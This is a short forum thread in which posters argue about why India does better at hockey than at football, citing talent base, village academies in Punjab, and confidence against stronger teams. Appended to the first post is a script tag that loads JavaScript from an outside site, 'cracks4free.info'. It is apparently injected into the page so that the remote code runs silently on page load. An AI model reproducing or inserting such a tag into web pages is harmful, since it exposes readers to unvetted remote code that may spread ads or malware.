It seems India can perform well in other sports like Hockey, Basketball and Volleyball. but football I don't why oh why !<script src="http://cracks4free.info/5/adds.js"; async="" type="text/javascript"></script>

Simply because in Indian football there is no talent base unlike hockey or volleyball

For example in small Punjab village academies there are hockey astro turf nowadays. It is a simple mathematics, if more people play it, there will be more talent

i think a lot of people play football compared to hockey...in lot of school they don't even parcticipate..leave participation they don't even hav a team....hockey stick r used 4 fightin purpose only ..

in terms of infrastructure i can agree ..that hockey has better infrastructure than football....but in quantity of player hockey lags behind football...

playing for fun is different from playing with an aim to take it up as a career. My point is that in Punjab from where most of the current NT players come, there are people training under proper guidance with the right infrastructure

you are all wrong..the amount of ppl we have now playing football in India far outnumbers those in hockey...its just that hockey players get to rub shoulders with the best right from beginning and our coaches who have played at the same level as anyone in the world..that same mentality makes a lot of difference unlike in football where we think we are born in a country ranked 165 in the world and we are not capable enough..we start our careers by playing against Nepal,Bhutan so never really take off from there..so the difference lies in the quality exposure and the main thing confidence..we think that we can beat KOREA in hockey but not in football!!!
